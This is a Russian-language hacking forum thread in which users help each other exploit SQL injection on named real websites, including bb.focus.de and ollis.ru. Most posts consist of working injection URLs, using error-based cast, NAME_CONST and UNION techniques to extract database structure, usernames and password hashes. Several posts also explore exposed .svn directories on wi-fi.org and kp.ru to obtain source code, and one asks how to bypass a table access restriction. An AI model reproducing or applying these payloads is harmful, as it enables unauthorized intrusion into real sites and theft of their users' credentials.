Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это PostgreSQL
    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
     
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    таблицы норм выводится через limit offset но на колонки ругается
    пххп://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(39)||pg_user||chr(39)+limit+1+offset+0)+as+int)--
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    имя таблицы лучше писать в сhr(), а не просто кавычки чарить, по аналогии с MySql, а у тебя гибрид какой-то конгениальный)
     
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    сначала проверил и имя таблицы в char но ничего не вышло тот же яйцо , но с боку
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    YuNi|[c,

    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+table_name||chr(47)||column_name+from+information_schema.columns+where+column_name+like+chr(37)||chr(109)||chr(97)||chr(105)||chr(108)||chr(37)+limit+1+offset+6)+as+int)


    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((select+username||chr(47)||user_password+from+phpbb_users2+limit+1+offset+1)+as+int)
     
    1 person likes this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс но всетаки я немного не понял запрос.

    если например мне надо найти колонки с таблицы usage_privileges

    http://bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+table_name+from+information_schema.tables+limit+1+offset+3)+as+int)--
    так какой будеть запрос?
     
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Не пойму,при переборе колонок на 5 значение вылетает пустая страничка,как поступить ????

    Сама sql http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4,5%23
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    bb.focus.de/focus/viewtopic.php?highlight=&t=102681+and+1=cast((SELECT+column_name+from+information_schema.columns+where+table_name=chr(117)||chr(115)||chr(97)||chr(103)||chr(101)||chr(95)||chr(112)||chr(114)||chr(105)||chr(118)||chr(105)||chr(108)||chr(101)||chr(103)||chr(101)||chr(115)+limit+1+offset+0)+as+int)--
    http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
     
    #11248 Kakoytoxaker, 31 Jan 2010
    Last edited: 31 Jan 2010
  9. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    А что это?))
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это вывод с твоей скули. Читай статьи
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    бло ппц
    сорри за тупой вопрос
    что не знал вообше про Postgresql ))

    ))
    спс всем за ответы
     
  12. Xeleon

    Xeleon New Member

    Joined:
    10 Jun 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Нашол да одной социалке скулу, панголин сказал что это mysql 5 базы сказал,операционку,пользователя, но неможет подобрать таблицы, вернее их имена и колонки. Пробывал вручную но там blind sql injection. Как можно определить таблицы с базы и колнки таблиц? Кстате на ковычку ругается:
    PHP:
    You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' order by auktionid DESC LIMIT 1' at line 1
    Пробывал перекодировать но все равно ругается.
     
  13. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если там блинд юзай прогу toolza 1.0 от пашкела или marathon tools
    эти как раз для блинд скули удобно


    Кстати кто знает какой нит прогу encoder/decoder CHAR для mssql/postgresql/mysql
    ручками долго кодировать
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Через NAME_CONST можно сделать вывод. Способ описывал QWAZAR. Либо через блинд по символу определять. Скинь ссылку в личку.
     
  15. aldonin

    aldonin New Member

    Joined:
    11 Jan 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Извинит вопрос не по теме.Но все же задам.Кто нибудь может рассказать как можно получить исходники с помощью svn уязвимости нашел на http://www.wi-fi.org/.svn/entries и еще на kp.ru/.svn/entries может это что дать?В форуме есть по этой уязвимости посты но там не нашел нужной информации.Заранее спасибо,кто поможет!
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    aldonin, http://habrahabr.ru/blogs/infosecurity/70330/

    Так что так. Поковыряй, может найдешь чего интересного

    http://www.wi-fi.org/.svn/text-base/info.php.svn-base
    http://kp.ru/.svn/text-base/autohandler.svn-base
     
    1 person likes this.
  17. aldonin

    aldonin New Member

    Joined:
    11 Jan 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Это я уже смотрел.А как они видели файловую структуру,такого не отображается почему-то?Пробывал через клиент но просит естественно пароль.Может там хеш валяется как нить полезный?=)
     
  18. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Делаю зарос

    http://www.ollis.ru/index.php?rest=1')%20union%20select%20*%20FROM%20(SELECT%20*%20FROM%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)d)%20as%20t%20%20JOIN%20(SELECT%20NAME_CONST((SELECT%20concat_ws(0x3a,user_loginname,user_password)%20FROM%20e107.e107_user%20LIMIT%201),%2014)e)%20b)a%23

    выводит только логин , как найти пароль?
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не выводит он логина, а пишет, что доступ к таблице e107_user текущему пользователю запрещен.
     
  20. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    И как это обойти?И возможно ли?
     
Thread Status:
Not open for further replies.